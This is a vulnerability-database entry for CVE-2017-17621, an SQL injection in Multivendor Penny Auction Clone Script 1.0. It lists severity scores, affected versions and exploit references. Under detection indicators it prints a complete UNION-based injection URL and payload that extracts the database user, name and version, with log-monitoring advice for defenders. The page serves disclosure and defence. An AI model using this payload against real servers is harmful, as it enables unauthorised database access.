CVE-2017-17621
published 2017-12-13CVE-2017-17621: Multivendor Penny Auction Clone Script 1.0 has SQL Injection via the PATH_INFO to the /detail URI.
PriorityP260critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
3.62%
88.1th percentile
Multivendor Penny Auction Clone Script 1.0 has SQL Injection via the PATH_INFO to the /detail URI.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| multivendor_penny_auction_clone_script_project | multivendor_penny_auction_clone_script | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlhttp://server/bidding/detail/-48++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29))--+-↗
command-48++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29))--+-↗
- →SQL injection is delivered via the PATH_INFO component of the URL (not a query parameter), targeting the /detail/ URI endpoint. Monitor HTTP access logs for UNION-based SQL payloads in the URL path segment following /detail/. ↗
- →Look for URL-path segments containing SQL keywords such as UNION, SELECT, CONCAT_WS, and comment sequences (--+-) immediately after /detail/ in HTTP request logs. ↗
- →The exploit uses a negative integer offset (-48) combined with UNION SELECT to trigger error-based/union-based data exfiltration of USER(), DATABASE(), and VERSION() via CONCAT_WS with hex delimiter 0x203a20. ↗
- ·The exploit was tested against version 1.0 only; other versions of the Multivendor Penny Auction Clone Script may or may not be affected. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
https://packetstormsecurity.com/files/145331/Multivendor-Penny-Auction-Clone-Script-1.0-SQL-Injection.htmlhttps://packetstormsecurity.com/files/145333/Multivendor-Penny-Auction-Clone-Script-1.0-SQL-Injection.htmlhttps://www.exploit-db.com/exploits/43290/https://packetstormsecurity.com/files/145331/Multivendor-Penny-Auction-Clone-Script-1.0-SQL-Injection.htmlhttps://packetstormsecurity.com/files/145333/Multivendor-Penny-Auction-Clone-Script-1.0-SQL-Injection.htmlhttps://www.exploit-db.com/exploits/43290/
2017-12-13
Published